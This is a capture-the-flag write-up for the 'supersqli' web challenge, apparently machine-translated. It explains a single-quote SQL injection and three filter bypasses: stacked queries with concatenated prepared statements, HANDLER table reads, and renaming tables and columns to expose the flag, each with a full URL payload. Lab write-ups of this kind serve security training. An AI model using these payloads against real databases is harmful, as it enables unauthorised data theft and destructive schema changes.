Attack and defend the world (web piece )—supersqli

After getting the title , It is found that it is a single quotation mark error character injection

order by 2 The page will echo normally ,order by 3 Page error during

Next union Inquire about , It is found that many statements are filtered

Bypass the filter , There are several ways

Stack query + precompile

Look up the table

Check field

Use precompiled method to check , But filtered

strstr Case sensitive

?inject=1';set @sql = CONCAT('sele','ct * from `1919810931114514`;');Prepare xiao from @sql;EXECUTE xiao;

handler Inquire about

handler grammar

Inquire about payload

?inject=1';handler `1919810931114514` open;handler `1919810931114514` read first; --+ 

Stack query + Change the name of the watch

Principle analysis

At the beginning, it is to query word Table data , So we can use the database to modify the table name and column name

First put the original words Change the name of the watch to something else , then 1919810931114514 Change the name of the table to words

Then change the name of the table after the flag Change the field to id (id Also need to show columns from word obtain )

And then we use 1’ or 1=1 --+ You can get it directly flag

modify payload

?inject=1';alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);